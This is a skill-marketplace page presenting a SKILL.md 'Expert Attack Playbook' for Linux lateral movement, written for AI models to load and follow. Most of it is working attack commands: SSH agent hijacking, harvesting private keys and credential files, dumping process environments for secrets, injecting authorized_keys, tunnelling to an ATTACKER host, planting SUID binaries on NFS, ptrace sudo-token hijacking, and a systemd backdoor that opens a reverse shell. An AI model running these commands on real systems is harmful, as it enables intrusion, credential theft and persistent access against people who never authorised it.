Linux Lateral Movement logo

Linux Lateral Movement

OrganizationPopular
yaklang
linux-lateral-movement

Linux lateral movement playbook. Use after gaining initial access to pivot across Linux hosts via SSH hijacking, credential harvesting, internal pivoting, D-Bus exploitation, sudo token reuse, and shared filesystem abuse.

Overview

Publisheryaklang
Repositoryhack-skills
Skill namelinux-lateral-movement
Stars
2.2K
Forks
292
Bundled files
Instructions only
LicenseMIT
Links
  • Markdown instructions

    A SKILL.md file the model loads on demand, so it only costs tokens when a request actually matches.

  • Works with any LLM

    AI skills are plain Markdown, not provider-specific code, so this works with GPT, Claude, Gemini, Grok, or a local model.

  • Self-contained

    Everything the model needs lives in the instructions — no extra files to sync.

  • Open source

    Published by yaklang on GitHub. Read the source before you install it.

Installation

Install the Linux Lateral Movement AI skill in TypingMind to use it with any LLM, or drop it into another agent that reads SKILL.md.

1

Install in TypingMind

TypingMind installs a skill straight from its GitHub folder — it reads SKILL.md, bundles the resource files, and stores the result locally.

  1. Open the app and go to Plugins → Skills.
  2. Choose "Install from GitHub".
  3. Paste the skill folder URL below and confirm.
  4. Enable the skill in any chat where you want it available.
Plugins → Skills → Add skill → From GitHub URL, then paste the folder URL and press Continue.
2

Install in another agent

Any agent that reads the Agent Skills format can use this skill — copy the folder into that agent's skills directory.

Claude Code — .claude/skills
git clone --depth 1 https://github.com/yaklang/hack-skills.git /tmp/hack-skills
mkdir -p .claude/skills
cp -r /tmp/hack-skills/skills/linux-lateral-movement .claude/skills/linux-lateral-movement
Restart Claude Code after copying so it picks up the new skill.

Use it in TypingMind

Enable Linux Lateral Movement in any TypingMind chat and the model takes it from there. Its name and description sit in the system prompt, and the moment a request matches, the model loads the full instructions itself — you never invoke it by hand, and it costs no tokens until it is actually used.

The model loads Linux Lateral Movement on its own as soon as a request matches it.

Works with any AI model

AI skills are plain Markdown instructions rather than provider-specific code, so Linux Lateral Movement is not tied to the model it was written for. Install it once in TypingMind and use it with GPT-5, Claude, Gemini, Grok, DeepSeek, Mistral, Llama, or a local model you run yourself — all on your own API keys.

  • Loaded only when it is needed

    The system prompt carries just the name and description. The instructions are fetched on the first matching request, so an idle skill costs nothing.

  • Switch models mid-chat

    Because the skill is instructions rather than code, changing model does not break it — the next model reads the same SKILL.md.

Skill instructions

This is the SKILL.md content the model loads. Read it before installing — a skill is instructions your model will follow.

SKILL: Linux Lateral Movement — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Linux lateral movement techniques. Covers SSH agent hijacking, key harvesting, credential locations, D-Bus exploitation, network pivoting, sudo token reuse, and systemd manipulation. Base models miss SSH_AUTH_SOCK hijacking and ptrace-based sudo session hijack.

0. RELATED ROUTING

Before going deep, consider loading:


1. SSH AGENT HIJACKING

1.1 Find SSH Agent Sockets

bash
# As root (or user with access to other users' processes):
find /tmp -path "*/ssh-*" -name "agent.*" 2>/dev/null
# Or via /proc:
grep -r SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'

# Typical path: /tmp/ssh-XXXXXX/agent.PID

1.2 Hijack Agent Forwarding

bash
# Set the found socket as our auth agent
export SSH_AUTH_SOCK=/tmp/ssh-AbCdEf/agent.12345

# List available keys in the agent
ssh-add -l
# If keys appear → we can use them

# SSH to any host this agent can authenticate to
ssh -o StrictHostKeyChecking=no user@internal-host

# The agent owner won't notice — we're using their forwarded agent

1.3 Persistent Agent Monitoring

bash
# Monitor for new SSH agent sockets (wait for admin to SSH in)
inotifywait -m /tmp -e create 2>/dev/null | grep ssh-
# Or poll:
while true; do
    find /tmp -path "*/ssh-*" -name "agent.*" -newer /tmp/.marker 2>/dev/null
    touch /tmp/.marker
    sleep 5
done

2. SSH KEY HARVESTING

2.1 Private Key Locations

bash
find / -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" -o -name "*.key" 2>/dev/null
# Also: /etc/ssh/ssh_host_*_key (MITM), /home/*/.ssh/id_*

# Find keys without passphrase:
for key in $(find / -name "id_*" ! -name "*.pub" 2>/dev/null); do
    ssh-keygen -y -P "" -f "$key" > /dev/null 2>&1 && echo "NO PASSPHRASE: $key"
done

2.2 known_hosts Parsing

bash
# Hashed known_hosts (common default):
cat ~/.ssh/known_hosts
# May be hashed — use ssh-keygen to check against known IPs:
ssh-keygen -F 10.0.0.1 -f ~/.ssh/known_hosts

# Unhashed known_hosts → direct IP/hostname list
awk '{print $1}' ~/.ssh/known_hosts | sort -u

# Extract all hostnames/IPs from all users' known_hosts
cat /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null \
  | awk '{print $1}' | tr ',' '\n' | sort -u

2.3 authorized_keys Injection

bash
# Generate attacker keypair (on attacker box)
ssh-keygen -t ed25519 -f /tmp/pivot_key -N ""

# Inject public key (on compromised host)
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /root/.ssh/authorized_keys
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /home/admin/.ssh/authorized_keys

# SSH back in with our key
ssh -i /tmp/pivot_key root@target

3. CREDENTIAL HARVESTING LOCATIONS

3.1 System Credentials

LocationContentsCommand
/etc/shadowPassword hashescat /etc/shadow (root)
/etc/passwdUser list, may contain hashescat /etc/passwd
.bash_historyCommand history (passwords in cleartext)cat /home/*/.bash_history
.mysql_historyMySQL commands with passwordscat /home/*/.mysql_history
.psql_historyPostgreSQL commandscat /home/*/.psql_history
.pgpassPostgreSQL password filecat /home/*/.pgpass
.my.cnfMySQL credentialscat /home/*/.my.cnf
.netrcFTP/HTTP auto-login credentialscat /home/*/.netrc
.git-credentialsGit HTTPS passwordscat /home/*/.git-credentials

3.2 Environment & Config Files

bash
# Current process secrets
env | grep -iE "pass|key|secret|token|api|cred|auth"

# All process environments (root):
for pid in /proc/[0-9]*; do
    cat $pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "pass|key|secret|token"
done

# Application configs (common credential locations):
find /var/www /opt /srv -name "wp-config.php" -o -name "settings.py" \
     -o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" 2>/dev/null

# Keyrings & secret stores:
find / -name "*.keyring" -o -name ".vault-token" -o -path "*/.password-store/*.gpg" 2>/dev/null

4. D-BUS EXPLOITATION

4.1 Enumerate D-Bus Services

bash
# List system bus services
dbus-send --system --dest=org.freedesktop.DBus \
  --type=method_call --print-reply \
  /org/freedesktop/DBus org.freedesktop.DBus.ListNames

# List session bus services
dbus-send --session --dest=org.freedesktop.DBus \
  --type=method_call --print-reply \
  /org/freedesktop/DBus org.freedesktop.DBus.ListNames

# Introspect a service (find available methods)
dbus-send --system --dest=org.freedesktop.systemd1 \
  --type=method_call --print-reply \
  /org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect

4.2 Abuse systemd & PolicyKit via D-Bus

bash
# Start a service via D-Bus (if policy allows):
dbus-send --system --dest=org.freedesktop.systemd1 \
  --type=method_call --print-reply /org/freedesktop/systemd1 \
  org.freedesktop.systemd1.Manager.StartUnit \
  string:"malicious.service" string:"replace"

# polkit actions available without auth:
pkaction --verbose 2>/dev/null | grep -B5 "implicit active: yes"

5. INTERNAL NETWORK PIVOTING

5.1 SSH Tunneling

bash
# Local port forward: access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 pivot@compromised-host

# Remote port forward: expose attacker service to internal network
ssh -R 8080:ATTACKER:8080 pivot@compromised-host

# Dynamic SOCKS proxy: route all traffic through pivot
ssh -D 1080 pivot@compromised-host
# Then: proxychains nmap -sT INTERNAL_RANGE

# SSH over SSH (multi-hop):
ssh -J user1@hop1,user2@hop2 target@final-host

5.2 Without SSH — Alternative Tunnels

bash
# socat port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL_HOST:80 &

# ncat relay
ncat -l -p 8080 --sh-exec "ncat INTERNAL_HOST 80"

# /dev/tcp (Bash built-in, no tools needed)
exec 3<>/dev/tcp/INTERNAL_HOST/80
echo -e "GET / HTTP/1.0\r\nHost: INTERNAL_HOST\r\n\r\n" >&3
cat <&3

# chisel (SOCKS proxy over HTTP)
# On attacker: chisel server -p 8080 --reverse
# On target:   chisel client ATTACKER:8080 R:socks

5.3 Network Discovery from Compromised Host

bash
ss -tlnp && ss -tnp                  # Listening & established connections
arp -a && ip neigh                    # Known adjacent hosts
cat /etc/resolv.conf                  # DNS servers
dig axfr internal.domain @dns 2>/dev/null   # Zone transfer

# Subnet sweep (bash-only, no tools):
for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i &>/dev/null && echo "ALIVE: 10.0.0.$i" & done; wait

# Port scan via /dev/tcp:
for port in 22 80 443 3306 5432 6379 8080; do
    (echo >/dev/tcp/10.0.0.1/$port) 2>/dev/null && echo "OPEN: $port"
done

6. SHARED FILESYSTEM EXPLOITATION

6.1 NFS Mounts

bash
# Discover NFS shares
showmount -e FILESERVER_IP 2>/dev/null

# Check for no_root_squash (root maps to root)
mount -t nfs FILESERVER_IP:/share /mnt/nfs
# If no_root_squash: create SUID binaries visible to other hosts

# All hosts mounting the same share → SUID binary = root on all hosts
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash

6.2 SMB/CIFS Shares

bash
# Enumerate shares
smbclient -L //FILESERVER_IP/ -N 2>/dev/null      # Null session
smbclient -L //FILESERVER_IP/ -U 'user%password'

# Mount and search for credentials
mount -t cifs //FILESERVER_IP/share /mnt/smb -o username=user,password=pass
find /mnt/smb -name "*.conf" -o -name "*.cfg" -o -name "*.kdbx" \
     -o -name "*.xlsx" -o -name "*.docx" 2>/dev/null

7. SUDO TOKEN REUSE (ptrace-Based)

bash
# If another user has an active sudo session (timestamp not expired):
# And we can ptrace their process (same UID or root)

# Check sudo timestamp files:
ls -la /var/run/sudo/ts/ 2>/dev/null
ls -la /var/db/sudo/ 2>/dev/null
# Files here mean active sudo tokens

# ptrace-based hijack:
# Attach to the user's shell process
# Inject: sudo /bin/bash
# The injected sudo inherits the valid timestamp → no password needed

# Automated tool: sudo_inject
# https://github.com/nongiach/sudo_inject
# Injects into processes with valid sudo tokens

8. SYSTEMD SERVICE MANIPULATION

bash
# Find writable unit files:
find /etc/systemd /usr/lib/systemd -writable -name "*.service" 2>/dev/null

# Inject into existing service (add ExecStartPre=):
# Or create new: /etc/systemd/system/backdoor.service
# [Service] Type=oneshot ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'
systemctl daemon-reload && systemctl enable --now backdoor.service

9. LATERAL MOVEMENT DECISION TREE

Compromised host — where to move next?
├── SSH credentials available?
│   ├── Private keys found? → try on all known_hosts targets (§2)
│   ├── SSH agent running? → hijack socket (§1)
│   ├── Passwords in history/configs? → spray across hosts (§3)
│   └── authorized_keys writable on other hosts? → inject key (§2.3)
├── Network services discovered?
│   ├── Internal web apps? → tunnel + attack (§5.1)
│   ├── Databases (3306/5432/6379)? → check harvested creds (§3)
│   ├── SMB/NFS shares? → mount + search for creds/SUID (§6)
│   └── Kubernetes API (6443)? → load kubernetes-pentesting skill
├── Can reach other hosts?
│   ├── Direct SSH? → use keys/passwords
│   ├── Firewalled? → SSH tunnel or chisel (§5)
│   └── No tools? → /dev/tcp + bash (§5.2)
├── Root on current host?
│   ├── Read /etc/shadow → crack hashes → password reuse (§3)
│   ├── Dump /proc/*/environ → find service credentials (§3.2)
│   ├── Hijack sudo tokens → piggyback admin sessions (§7)
│   └── Modify systemd services → backdoor (§8)
├── D-Bus services available?
│   ├── Privileged services exposed? → method call abuse (§4)
│   └── polkit actions without auth? → privilege actions (§4.3)
└── No obvious path?
    ├── ARP scan + port sweep internal network (§5.3)
    ├── Passive credential sniffing (if cap_net_raw)
    ├── Wait for admin SSH → agent hijack (§1.3)
    └── Check for cloud metadata (169.254.169.254)

Frequently asked questions

What does the Linux Lateral Movement AI skill do?

Linux lateral movement playbook. Use after gaining initial access to pivot across Linux hosts via SSH hijacking, credential harvesting, internal pivoting, D-Bus exploitation, sudo token reuse, and shared filesystem abuse.

Why use Linux Lateral Movement on TypingMind?

Because you install it once and use it with any model. Linux Lateral Movement is plain Markdown rather than provider-specific code, so the same skill runs on GPT-5, Claude, Gemini, Grok, or a local model — and you can switch model mid-chat without it breaking. TypingMind runs on your own API keys, so you pay providers directly instead of a per-seat subscription, and your skills and chats stay in your own storage.

How do I install Linux Lateral Movement in TypingMind?

Open Plugins → Skills → Install from GitHub in TypingMind and paste https://github.com/yaklang/hack-skills/tree/main/skills/linux-lateral-movement. TypingMind reads its SKILL.md and installs it as a skill you can enable per chat.

Which AI models can use Linux Lateral Movement?

Any model you connect in TypingMind. AI skills are plain Markdown instructions rather than provider-specific code, so GPT, Claude, Gemini, Grok, and local models can all load this skill when a request matches it.

How many AI models can I use with Linux Lateral Movement?

As many as you like. As long as a model supports skills, you can use Linux Lateral Movement with it — GPT, Claude, Gemini, Grok, DeepSeek, Mistral, Llama and more — all on TypingMind with your own API keys.

Is the Linux Lateral Movement AI skill free?

Yes. It is published on GitHub by yaklang under the MIT license. You only pay your own AI provider for the tokens you use.

What are AI skills?

An AI skill is a reusable instruction bundle that teaches an AI model how to do one specific task. It follows the open Agent Skills format: a SKILL.md file with a name and description, plus any scripts, templates or reference files the model may need. The model reads the instructions only when your request matches the skill, so an installed skill costs nothing until it is used.

How are AI skills different from plugins or MCP servers?

A plugin or MCP server gives a model new tools to call — code that runs somewhere and returns a result. An AI skill gives the model knowledge and process instead: how to approach a task, which steps to follow, what good output looks like. Skills are plain Markdown, so they need no server, no API key and no runtime, and they work with any model.

View all

Set up your own AI workspace now

Get notified about new features and future giveaways by subscribing to our newsletter 👇